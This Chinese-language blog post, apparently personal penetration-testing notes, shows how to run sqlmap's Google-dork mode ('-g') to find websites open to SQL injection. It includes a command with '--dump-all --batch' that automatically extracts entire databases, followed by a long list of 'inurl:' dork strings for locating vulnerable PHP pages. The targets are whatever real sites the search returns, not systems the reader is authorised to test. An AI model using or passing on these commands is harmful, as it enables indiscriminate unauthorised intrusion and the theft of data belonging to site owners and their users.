sqlmap渗透笔记之Google Hack

固若金汤 (2116) 2024-01-05 20:32:34

利用Google Dorks字符串找到可注入的网站

sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)

使用示例:
1.sqlmap.py -g "inurl:php?id="

2.sqlmap.py -g "inurl:php?id=" --dump-all --batch
google搜索注入点 自动跑出所有字段

部分关键字(根据自己需要的去使用):
inurl:item_id=  
inurl:review.php?id=    
inurl:hosting_info.php?id=
inurl:newsid=   
inurl:iniziativa.php?in=    
inurl:gallery.php?id=
inurl:trainers.php?id=  
inurl:curriculum.php?id=    
inurl:rub.php?idr=
inurl:news-full.php?id= 
inurl:labels.php?id=    
inurl:view_faq.php?id=
inurl:news_display.php?getid=   
inurl:story.php?id= 
inurl:artikelinfo.php?id=
inurl:index2.php?option=    
inurl:look.php?ID=  
inurl:detail.php?ID=
inurl:readnews.php?id=  
inurl:newsone.php?id=   
inurl:index.php?=
inurl:top10.php?cat=    
inurl:aboutbook.php?id= 
inurl:profile_view.php?id=
inurl:newsone.php?id=   
inurl:material.php?id=  
inurl:category.php?id=
inurl:event.php?id= 
inurl:opinions.php?id=  
inurl:publications.php?id=
inurl:product-item.php?id=  
inurl:announce.php?id=  
inurl:fellows.php?id=
inurl:sql.php?id=   
inurl:rub.php?idr=  
inurl:downloads_info.php?id=
inurl:index.php?catid=  
inurl:galeri_info.php?l=    
inurl:prod_info.php?id=
inurl:news.php?catid=   
inurl:tekst.php?idt=    
inurl:shop.php?do=part&id=
inurl:index.php?id= 
inurl:newscat.php?id=   
inurl:productinfo.php?id=
inurl:news.php?id=  
inurl:newsticker_info.php?idn=  
inurl:collectionitem.php?id=
inurl:index.php?id= 
inurl:rubrika.php?idr=  
inurl:band_info.php?id=
inurl:trainers.php?id=  
inurl:rubp.php?idr= 
inurl:product.php?id=
inurl:buy.php?category= 
inurl:offer.php?idf=    
inurl:releases.php?id=
inurl:article.php?ID=   
inurl:art.php?idm=  
inurl:ray.php?id=
inurl:play_old.php?id=  
inurl:title.php?id= 
inurl:produit.php?id=
inurl:declaration_more.php?decl_id= 
inurl:news_view.php?id= 
inurl:pop.php?id=
inurl:pageid=   
inurl:select_biblio.php?id= 
inurl:shopping.php?id=
inurl:games.php?id= 
inurl:humor.php?id= 
inurl:productdetail.php?id=
inurl:page.php?file=    
inurl:aboutbook.php?id= 
inurl:post.php?id=
inurl:newsDetail.php?id=    
inurl:ogl_inet.php?ogl_id=  
inurl:viewshowdetail.php?id=
inurl:gallery.php?id=   
inurl:fiche_spectacle.php?id=   
inurl:clubpage.php?id=
inurl:article.php?id=   
inurl:communique_detail.php?id= 
inurl:memberInfo.php?id=
inurl:show.php?id=  
inurl:sem.php3?id=  
inurl:section.php?id=
inurl:staff_id= 
inurl:kategorie.php4?id=    
inurl:theme.php?id=
inurl:newsitem.php?num= 
inurl:news.php?id=  
inurl:page.php?id=
inurl:readnews.php?id=  
inurl:index.php?id= 
inurl:shredder-categories.php?id=
inurl:top10.php?cat=    
inurl:faq2.php?id=  
inurl:tradeCategory.php?id=
inurl:historialeer.php?num= 
inurl:show_an.php?id=   
inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=   
inurl:preview.php?id=   
inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= 
inurl:loadpsb.php?id=   
inurl:transcript.php?id=
inurl:forum_bds.php?num=    
inurl:opinions.php?id=  
inurl:channel_id=
inurl:game.php?id=  
inurl:spr.php?id=   
inurl:aboutbook.php?id=
inurl:view_product.php?id=  
inurl:pages.php?id= 
inurl:preview.php?id=
inurl:newsone.php?id=   
inurl:announce.php?id=  
inurl:loadpsb.php?id=
inurl:sw_comment.php?id=    
inurl:clanek.php4?id=   
inurl:pages.php?id=
inurl:news.php?id=  
inurl:participant.php?id=    
inurl:avd_start.php?avd=    
inurl:download.php?id=   
inurl:event.php?id= 
inurl:main.php?id=   
inurl:product-item.php?id=  
inurl:review.php?id=     
inurl:sql.php?id=   
inurl:chappies.php?id=   
inurl:material.php?id=  
inurl:read.php?id=   
inurl:clanek.php4?id=   
inurl:prod_detail.php?id=    
inurl:announce.php?id=  
inurl:viewphoto.php?id=  
inurl:chappies.php?id=  
inurl:article.php?id=    
inurl:read.php?id=  
inurl:person.php?id=     
inurl:viewapp.php?id=   
inurl:productinfo.php?id=    
inurl:viewphoto.php?id= 
inurl:showimg.php?id=    
inurl:rub.php?idr=  
inurl:view.php?id=   
inurl:galeri_info.php?l=    
inurl:website.php?id=    
THE END

发表评论